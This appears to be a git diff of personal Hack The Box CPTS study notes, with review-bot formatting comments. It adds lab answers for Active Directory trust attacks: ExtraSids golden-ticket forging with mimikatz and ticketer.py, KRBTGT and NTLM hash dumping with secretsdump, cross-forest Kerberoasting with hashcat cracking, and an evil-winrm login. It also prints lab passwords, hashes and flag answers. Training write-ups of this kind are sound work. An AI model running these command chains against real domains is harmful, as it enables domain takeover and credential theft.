| 8 hours | Exploitation & Lateral Movement.
Machines:
- [Rabbit](https://www.youtube.com/watch?v=5nnJq_IWJog)
-  [SneakyMailer](https://0xdf.gitlab.io/2020/11/28/htb-sneakymailer.html)
- [Reel](https://0xdf.gitlab.io/2018/11/10/htb-reel.html) | | -| 11 | Pivoting, Tunneling, and Port Forwarding | [Pivoting, Tunneling, and Port Forwarding](pivoting-tunneling-portforwarding.md) | 2 days | Exploitation & Lateral Movement.
Machines:
- [Enterprise](https://app.hackthebox.com/machines/Enterprise) [IPPSec Walkthrough](https://youtube.com/watch?v=NWVJ2b0D1r8&t=2400)
- [Inception](https://app.hackthebox.com/machines/Inception) [IPPSec Walkthrough](https://youtube.com/watch?v=J2I-5xPgyXk&t=2330)
- [Reddish](https://app.hackthebox.com/machines/Reddish) [IPPSec Walkthrough](https://youtube.com/watch?v=Yp4oxoQIBAM&t=2466) | | -| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)
Enumerating from Linux, Enumerating from Windows, Attacks from Windows, Attacks from Linux, Lateral Movements from Linux, Lateral movement from Windows, Privilege Escalation from Linux, Privilege Escalation from Windows.
Tools: Powershell, Active Directory Module, | 7 days | Exploitation & Lateral Movement | | -| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | | -| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | | -| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | | -| 16 | SQL Injection Fundamentals | | 8 hours | Web Exploitation | | -| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | | -| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | | -| 19 | File Inclusion | | 8 hours | Web Exploitation | | -| 20 | File Upload Attacks | | 8 hours | Web Exploitation | | -| 21 | Command Injections | | 6 hours | Web Exploitation | | -| 22 | Web Attacks | [Web exploitation](webexploitation/index.md) | 2 days | Web Exploitation | | -| 23 | Attacking Common Applications | | 4 days | Web Exploitation | | -| 24 | Linux Privilege Escalation | | 8 hours | Post-Exploitation | | -| 25 | Windows Privilege Escalation | | 4 days | Post-Exploitation | | -| 26 | Documentation & Reporting | | 2 days | Reporting & Capstone | | -| 27 | Attacking Enterprise Networks | | 2 days | Reporting & Capstone | | +| Number | Module | My notes | Duration | | | +| ------ | ---------------------------------------- | 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | +| 01 | Penetration Testing Process | [Penetration Testing Process](penetration-testing-process.md) | 6 hours | Introduction | | +| 02 | Network Enumeration with Nmap | [(Almost) all about nmap](nmap.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | +| 03 | Footprinting | [Introduction to footprinting](footprinting.md)
[Infrastructure and web enumeration](information-gathering.md)
Some services: [FTP](21-ftp.md), [SMB](137-138-139-445-smb.md), [NFS](2049-nfs-network-file-system.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP3](110-143-993-995-imap-pop3.md),[SNMP](161-162-snmp.md), [MySQL](3306-mariadb-mysql.md), [Oracle TNS](1521-oracle-transparent-network-substrate.md), [IPMI](623-1900-intelligent-platform-management-interface-ipmi.md), [SSH](22-ssh.md), [RSYNC](873-rsync.md), [R Services](512-513-514-remote-services.md), [RDP](3389-rdp.md), [WinRM](5985-5986-winrm-windows-remote-management.md), [WMI](135-windows-management-instrumentation-wmi.md) | 2 days | Reconnaissance, Enumeration & Attack Planning | | +| 04 | Information Gathering - Web Edition | [Information Gathering - Web Edition](information-gathering.md). With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [Google Dorks](google-dorks.md) More tools for recon: [finalrecon](finalrecon.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | +| 05 | Vulnerability Assessment | [Vulnerability Assessment](vulnerability-assessment.md):
[Nessus](nessus.md), [Openvas](openvas.md) | 2 hours | Reconnaissance, Enumeration & Attack Planning | | +| 06 | File Transfer techniques | File Transfer Techniques:
[Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](webexploitation/arbitrary-file-upload.md), [File encryption](file-encryption.md), [Evading techniques when transferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) | 3 hours | Reconnaissance, Enumeration & Attack Planning | | +| 07 | Shells & Payloads | [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)), [Windows footprinting](windows-footprinting.md), | 2 days | Reconnaissance, Enumeration & Attack Planning | | +| 08 | Using the Metasploit Framework | [Metasploit](metasploit.md), [Msfvenom](msfvenom.md) | 5 hours | Reconnaissance, Enumeration & Attack Planning | | +| 09 | Password Attacks | [Password attacks](webexploitation/password-attacks.md) | 8 hours | Exploitation & Lateral Movement | | +| 10 | Attacking Common Services | Common services: [FTP](21-ftp.md)
[SMB](137-138-139-445-smb.md) (tools: [smbclient](smbclient.md), [smbmap](smbmap.md), [rpcclient](rpcclient.md), [Samba Suite](samba-suite.md), [crackmapexec](crackmapexec.md), [impacket-smbexec](impacket-smbexec.md), [impacket-psexec](impacket-psexec.md)), Databases ([MySQL](mysql.md) and [Attacking MySQL](3306-mariadb-mysql.md), [MSSQL](mssql.md) and [Atacking MSSQL](1433-mssql.md), [log4j](log4j.md), [RDP](3389-rdp.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP protocols](110-143-993-995-imap-pop3.md), [postfix](postfix.md), [swaks](swaks.md)
| 8 hours | Exploitation & Lateral Movement.
Machines:
- [Rabbit](https://www.youtube.com/watch?v=5nnJq_IWJog)
-  [SneakyMailer](https://0xdf.gitlab.io/2020/11/28/htb-sneakymailer.html)
- [Reel](https://0xdf.gitlab.io/2018/11/10/htb-reel.html) | | +| 11 | Pivoting, Tunneling, and Port Forwarding | [Pivoting, Tunneling, and Port Forwarding](pivoting-tunneling-portforwarding.md) | 2 days | Exploitation & Lateral Movement.
Machines:
- [Enterprise](https://app.hackthebox.com/machines/Enterprise) [IPPSec Walkthrough](https://youtube.com/watch?v=NWVJ2b0D1r8&t=2400)
- [Inception](https://app.hackthebox.com/machines/Inception) [IPPSec Walkthrough](https://youtube.com/watch?v=J2I-5xPgyXk&t=2330)
- [Reddish](https://app.hackthebox.com/machines/Reddish) [IPPSec Walkthrough](https://youtube.com/watch?v=Yp4oxoQIBAM&t=2466) | | +| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)

**From Linux:**
- [Enumeration](active-directory-from-linux-enumeration.md),
- [Attacks](active-directory-from-linux-attacks),
- [Lateral Movements](active-directory-from-linux-lateral-movement.md),
- [Privilege Escalation](active-directory-from-linux-privilege-escalation.md).

**From Windows:**
- [Enumeration](active-directory-from-windows-enumeration.md),
- [Attacks](active-directory-from-windows-attacks.md),
- [Privilege Escalation](active-directory-from-windows-privilege-escalation.md).

**Tools:**
- [Powershell](powershell.md),
- [Active Directory powershell Module](activedirectory-powershell-module.md),
- [Enumeration with LDAP queries](389-636-ldap.md)
- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md).
- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md).
- [BloodHound (C# and PowerShell Collectors)](bloodhound.md).
- [SharpView (C#)](sharpview.md).
- [kerbrute](kerbrute.md).
- [Crackmapexec](crackmapexec.md).
- [enum4linux](enum4linux.md). | 7 days | Exploitation & Lateral Movement | | +| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | | +| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | | +| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | | +| 16 | SQL Injection Fundamentals | | 8 hours | Web Exploitation | | +| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | | +| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | | +| 19 | File Inclusion | | 8 hours | Web Exploitation | | +| 20 | File Upload Attacks | | 8 hours | Web Exploitation | | +| 21 | Command Injections | | 6 hours | Web Exploitation | | +| 22 | Web Attacks | [Web exploitation](webexploitation/index.md) | 2 days | Web Exploitation | | +| 23 | Attacking Common Applications | | 4 days | Web Exploitation | | +| 24 | Linux Privilege Escalation | | 8 hours | Post-Exploitation | | +| 25 | Windows Privilege Escalation | | 4 days | Post-Exploitation | | +| 26 | Documentation & Reporting | | 2 days | Reporting & Capstone | | +| 27 | Attacking Enterprise Networks | | 2 days | Reporting & Capstone | | ## Practicing Steps diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md index d25b42f4a..82dd2976c 100644 --- a/docs/cpts-labs.md +++ b/docs/cpts-labs.md 
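Review bot: The rewritten row 12 (from `**From Linux:**` down to `- [enum4linux](enum4linux.md). | 7 days |`) places blank lines and `-` bullet lists inside a Markdown table cell, which Python-Markdown (and therefore MkDocs) does not support: a blank line ends the block, so the table will close at `**From Linux:**` and rows 12 through 27 will render as loose text. Either keep the cell on a single line with `<br>` separators or move this breakdown into active-directory.md and leave one link in the index. Two smaller issues in the same cell: `[Attacks](active-directory-from-linux-attacks)` lacks the `.md` suffix every other link has, and `activedirectory-powershell-module.md` is linked twice (`Active Directory powershell Module` and `The ActiveDirectory PowerShell module`). Since the hunk rewrites every row anyway, the pre-existing hard newlines in rows 03, 05, 06, 10 and 11, the duplicated `[OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md)` in row 04, and `Atacking MSSQL` in row 10 could be cleaned up at the same time.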
@@ -3844,14 +3844,219 @@ Results: Pass@word ### Why So Trusting? -Question +**RDP to  with user "htb-student" and password "Academy_student_AD!". What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)** +```powershell +Import-Module activedirectory +Get-ADTrust -Filter * ``` +Results: LOGISTICS.INLANEFREIGHT.LOCAL, + +**What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?** + +```powershell +# Same as above +Import-Module activedirectory +Get-ADTrust -Filter * ``` -Results: +Results: FREIGHTLOGISTICS.LOCAL + +**What direction is this trust?** + +Results: Bidirectional + + +**RDP to  with user "htb-student_adm" and password "HTB_@cademy_stdnt_admin!". What is the SID of the child domain?** + +```powershell +# As we are already in the child domain: +Import-Module .\PowerView.ps1 +Get-DomainSID +``` + +Results: S-1-5-21-2806153819-209893948-922872689 + + + **What is the SID of the Enterprise Admins group in the root domain?** + +```powershell +Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid + +``` + +Results: S-1-5-21-3842939050-3880317879-2865463114-519 + + +**Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.** + +``` +# The complete attack would require getting the golden tickets. +# Step 1: get SID of the Child domain +Import-Module .\PowerView.ps1 +Get-DomainSID +# Result: S-1-5-21-2806153819-209893948-922872689 + + +# Step 2: get KRBTGT hash for the child domain +# Go to mimikatz.exe file in the explorer and execute as admin +lsadump::dcsync /user:$domain\$user +# Result: `9d765b482771505cbe97411065964d5f`. + +# Step 3: getting the name of a target user in the child domain (does not need to exist!) +# Result: hacker + +# Step 4: getting the FQDN of the child domain. 
+# Listed above in mimikatz output +# Result: `LOGISTICS.INLANEFREIGHT.LOCAL` + +# Step 5: getting the SID of the Enterprise Admins group of the root domain +# Way #1: +Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid +# Way #2: +Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL" +# Result: `S-1-5-21-3842939050-3880317879-2865463114-519` + +# Step 6: the attack +# Generate a golden ticket: +kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt +# Read the flag (make sure that the ticket has been created with klist) +cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt +``` + +Results: f@ll1ng_l1k3_d0m1no3$ + + +**SSH to with user "htb-student" and password "HTB_@cademy_stdnt!". Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.** + +``` +#### Step 1: getting the KRBTGT hash for the child domain +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 9d765b482771505cbe97411065964d5f +#### + +#### Step 2: getting the SID for the child domain. Obtain the SID for the domain and the RIDs for each user and group and filter out by Domain SID +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! 
+# Results: S-1-5-21-2806153819-209893948-922872689 +#### + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) +hacker +#### + +#### Step 4: getting the FQDN of the child domain. +logistics.inlanefreight.local +#### + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +#### + +#### Step 6: Generate a golden ticket +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker + +# The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: +[*] Saving ticket in hacker.ccache + +# Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. +export KRB5CCNAME=hacker.ccache +#### + +#### Step 7: Accessing another user on domain +# With one user, we will request the NTLM hash for another user +secretsdump.py $ControlledUsername@$hostnameController.$Parentdomain -k -no-pass -just-dc-ntlm -just-dc-user $targetUsername +# Example: +# secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross + +``` + +Results: 49a074a39dd0651f647e765c2cc794c7 + +### Breaking Down Boundaries + + +**Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. 
Crack the ticket and submit the account's cleartext password as your answer.** + +``` +#### Enumerating SPNs +Get-DomainUser -SPN -Domain $TargetDomain | select SamAccountName +# Example: +# Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName +# Results: mssqlsvc +###### + +#### Getting which groups is mssqlsvc member of +Get-DomainUser -Domain $TargetDomain -Identity $interestingUserSamAccountName | select samaccountname,memberof +# Example: +# Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof +# Results: CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL +###### + +#### Performing a Kerberoasting Attacking with Rubeus Using /domain Flag +.\Rubeus.exe kerberoast /domain:$TargetDomain /user:$interestingUserSamAccountName /nowrap +# Example: +# .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap +# Results: [the kerberos ticket] +#### + +#### Crack it +hashcat -m 13100 ticketTocrack /usr/share/wordlists/rockyou.txt +``` + +Results: 1logistics + + +**Kerberoast across the forest trust from the Linux attack host. 
Submit the name of another account with an SPN aside from MSSQLsvc.** + +``` +GetUserSPNs.py -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + +Results: sapsso + + +**Crack the TGS and submit the cleartext password as your answer.** + +``` +GetUserSPNs.py -request -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 + +# Cracking the sapsso TGS: +hashcat -m 13100 sapsso /usr/share/wordlists/rockyou.txt +``` + +Results: pabloPICASSO + + + +**Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.** + +``` +evil-winrm -i 172.16.5.238 -u sapsso -p pabloPICASSO +cat c:\Users\Administrator\Desktop\flag.txt +``` + +Results: burn1ng_d0wn_th3_f0rest! Question @@ -3863,7 +4068,6 @@ Question Results: - ## [Using Web Proxies](https://academy.hackthebox.com/module/details/110) ### Intercepting Web Requests diff --git a/docs/img/blood02.png b/docs/img/blood02.png new file mode 100644 index 000000000..73261bd07 Binary files /dev/null and b/docs/img/blood02.png differ diff --git a/docs/img/blood03.png b/docs/img/blood03.png new file mode 100644 index 000000000..4ab8db8be Binary files /dev/null and b/docs/img/blood03.png differ diff --git a/docs/impacket-psexec.md b/docs/impacket-psexec.md index 6a5706921..bf125d118 100644 --- a/docs/impacket-psexec.md +++ b/docs/impacket-psexec.md 
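Review bot: In the Linux ExtraSids block, Step 2's `lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP` is missing the `$` on `TargetedIP`, so the template line does not expand like the other steps, and Step 6 embeds the tool's output `[*] Saving ticket in hacker.ccache` without a `#` prefix, so it would be executed as a command if the block were pasted. Three of the question headings have lost their hostnames (`RDP to  with user "htb-student"`, `RDP to  with user "htb-student_adm"`, `SSH to with user`), the first answer carries a trailing comma (`LOGISTICS.INLANEFREIGHT.LOCAL,`), and the Windows block's `lsadump::dcsync /user:$domain\$user` uses shell-style placeholders inside a mimikatz command while the steps around it use literal values. The ExtraSids, Kerberoast and evil-winrm fences have no language tag although the earlier blocks in the hunk use `powershell`; tagging them (`bash` or `powershell` as appropriate) keeps the page consistent.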
@@ -9,7 +9,7 @@ tags: --- # Impacket PsExec -The PSExec service then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system. Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the `ADMIN$` share on the target host. It then registers the service via `RPC` and the `Windows Service Control Manager`. Once established, communication happens over a named pipe, providing an interactive remote shell as `SYSTEM` on the victim host. +The [PSExec service](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system. Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the `ADMIN$` share on the target host. It then registers the service via `RPC` and the `Windows Service Control Manager`. Once established, communication happens over a named pipe, providing an interactive remote shell as `SYSTEM` on the victim host. ## Installation
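Review bot: The new link wraps the words `PSExec service`, but the URL points at the `psexec.py` script, and the paragraph still opens with `then creates a named pipe` before the tool has been introduced, so the first sentence describes the second step of a sequence whose first step is explained later. Suggest attaching the link to `Psexec.py` in the second sentence and reordering so the paragraph runs: Psexec.py uploads a randomly named executable to `ADMIN$`, registers it as a service via `RPC` and the `Windows Service Control Manager`, and that service then creates the named pipe used for the `SYSTEM` shell. The same paragraph also spells the tool `PSExec`, `Psexec` and `psexec`; pick one form.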